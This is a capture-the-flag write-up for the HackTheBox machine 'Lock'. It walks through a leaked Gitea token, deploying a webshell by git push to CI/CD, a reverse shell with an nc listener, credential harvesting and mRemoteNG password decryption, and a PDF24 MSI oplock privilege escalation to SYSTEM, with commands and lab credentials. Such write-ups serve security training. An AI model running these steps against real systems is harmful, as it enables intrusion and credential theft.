Post

HTB Lock CTF Writeup

A Gitea API key leaked in git commit history reveals a private repository with active CI/CD; deploying a webshell via git push yields a foothold. mRemoteNG credentials are decrypted to pivot to another user, and a PDF24 MSI repair local privilege escalation via opportunistic lock (oplock) abuse grants a SYSTEM shell.

HTB Lock CTF Writeup

HTB Lock CTF

Gitea Enumeration

Gitea is running on port 3000. There’s a public repository named “dev-scripts”. The repository has 2 commits. When inspecting the second (latest) commit for changes, it’s possible to see that they left an API key hardcoded:

image.webp

The API key is:

1
43ce39bb0bd6bc489284f2905f033ca467a6362f

I did clone the repository:

1
2
3
4
5
6
7
8
$ git clone http://10.129.15.248:3000/ellen.freeman/dev-scripts.git
Cloning into 'dev-scripts'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 6 (delta 1), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (6/6), done.
Resolving deltas: 100% (1/1), done.

When using the script with the leaked API key, we see there’s one more repository we don’t see as an unauthenticated user (website):

1
2
3
4
5
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/dev-scripts$ export GITEA_ACCESS_TOKEN=43ce39bb0bd6bc489284f2905f033ca467a6362f
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/dev-scripts$ python3 repos.py http://10.129.15.248:3000/
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website

The reference for the gitea API is at http://10.129.15.248:3000/api/swagger

image.webp

I clicked the “authorize” button and used the api key to authorize
image.webp

However, after exploring the API, I couldn’t find anything useful. After some research, I discovered it’s possible to clone repositories using the PAT (personal access token)

Using the token as password, I cloned the website repository:

1
2
3
4
5
6
7
8
9
10
$ git clone http://10.129.15.248:3000/ellen.freeman/website.git
Cloning into 'website'...
Username for 'http://10.129.15.248:3000': ellen.freeman
Password for 'http://[email protected]:3000': 
remote: Enumerating objects: 165, done.
remote: Counting objects: 100% (165/165), done.
remote: Compressing objects: 100% (128/128), done.
remote: Total 165 (delta 35), reused 153 (delta 31), pack-reused 0
Receiving objects: 100% (165/165), 7.16 MiB | 461.00 KiB/s, done.
Resolving deltas: 100% (35/35), done.

There’s a readme file in the website repo, saying that the CI/CD integration is up (meaning, changes to the webserver will be automatically deployed)

image.webp

I added the antak webshell to the repo and pushed it to main:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock$ mv antak.aspx website/
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock$ cd website/
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/website$ git status 
On branch main
Your branch is up to date with 'origin/main'.

Untracked files:
  (use "git add <file>..." to include in what will be committed)
        antak.aspx

nothing added to commit but untracked files present (use "git add" to track)
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/website$ git add .
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/website$ git commit -m 'feat: add webshell'
[main 76dcf2c] feat: add webshell
 1 file changed, 270 insertions(+)
 create mode 100644 antak.aspx
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/website$ git push
Username for 'http://10.129.15.248:3000': ellen.freeman
Password for 'http://[email protected]:3000': 
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 5 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 4.16 KiB | 4.16 MiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.129.15.248:3000/ellen.freeman/website.git
   73cdcc1..76dcf2c  main -> main

The shell was available right away in the webserver at http://10.129.15.248/antak.aspx

image.webp

Remote Code Execution

After uploading antak webshell, I created a powershell encoded payload (via revshells.com) to get a reverse shell going.

image.webp

1
2
3
4
5
6
7
$ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.112] from (UNKNOWN) [10.129.15.248] 58861


PS C:\windows\system32\inetsrv> PS C:\windows\system32\inetsrv> 
PS C:\windows\system32\inetsrv>

Lateral Movement

Credential Hunting

Found credentials for ellen.freeman

1
2
PS C:\users\ellen.freeman> type .git-credentials
http://ellen.freeman:YWFrWJk9uButLeqx@localhost:3000

Also found a config file for mRemoteNG in ellen.freeman’s Documents folder (C:\users\ellen.freeman\Documents):

image.webp

I used a python script from a github repository to decrypt the password (https://github.com/gquere/mRemoteNG_password_decrypt):

1
2
3
4
5
$ python3 mremoteng_decrypt.py ~/hacking/htb/machines/easy/lock/config.xml 
Name: RDP/Gale
Hostname: Lock
Username: Gale.Dekarios
Password: ty8wnW9qCKDosXo6

The credential is indeed valid:

image.webp

I used xfreerdp to connect to the server:

1
$ xfreerdp /v:10.129.15.248 /u:'Gale.Dekarios' /p:'ty8wnW9qCKDosXo6'

The user flag is in gale.dekarios’ desktop folder.

There is a non-default app in dekarios’ desktop folder:

image.webp

The software version can be found easily via the system tray icon:

image.webp

A quick google search revealed that this version is prone to a local privilege escalation vulnerability (https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-msi-installer-in-pdf24-creator-geek-software-gmbh/) by using the MSI installer.

To locate the MSI installer for this specific version, I first noticed how the naming scheme looks like for the file name thanks to the blog post

image.webp

And used the cmd below to locate the file in the C drive:

1
2
3
C:\Users\gale.dekarios>cmd.exe /c "where /R C:\ pdf24-creator-11.15.1-x64.msi 2>nul"

C:\_install\pdf24-creator-11.15.1-x64.msi

I downloaded the tool described in the blog post (https://github.com/googleprojectzero/symboliclink-testing-tools/releases/tag/v1.0):

image.webp

I used xfreerdp’s drive feature to upload the tool to the machine:

1
user@attackbox:~/hacking/htb/machines/easy/lock$ xfreerdp /v:10.129.15.248 /u:'Gale.Dekarios' /p:'ty8wnW9qCKDosXo6' /drive:bsec,.

It worked, the drive was created in my rdp session:

image.webp

I copied SetOpLock.exe to the machine.

I started the repair process:

1
msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi

When the repair window popped up, I used SetOpLock:

1
2
3
C:\Users\gale.dekarios>cd Desktop

C:\Users\gale.dekarios\Desktop>.\SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r

Then, after a few seconds, at the very end of the repair process, pdf24-PrinterInstall.exe runs but does not close. I can use that window to go on Properties:

image.webp

Click to learn more about the legacy console mode:

image.webp

When you click on it, you’re presented with a popup to select a web browser:

image.webp

The article says specifically not to use edge or internet explorer because it does not run as SYSTEM. Thankfully, Firefox is present on the system. Select Firefox to open.

Then, when firefox opens, press “Ctrl + O” and open cmd.exe:

image.webp

cmd.exe will appear in the downloads tab. Open it to have a SYSTEM shell.

image.webp

This post is licensed under CC BY 4.0 by the author.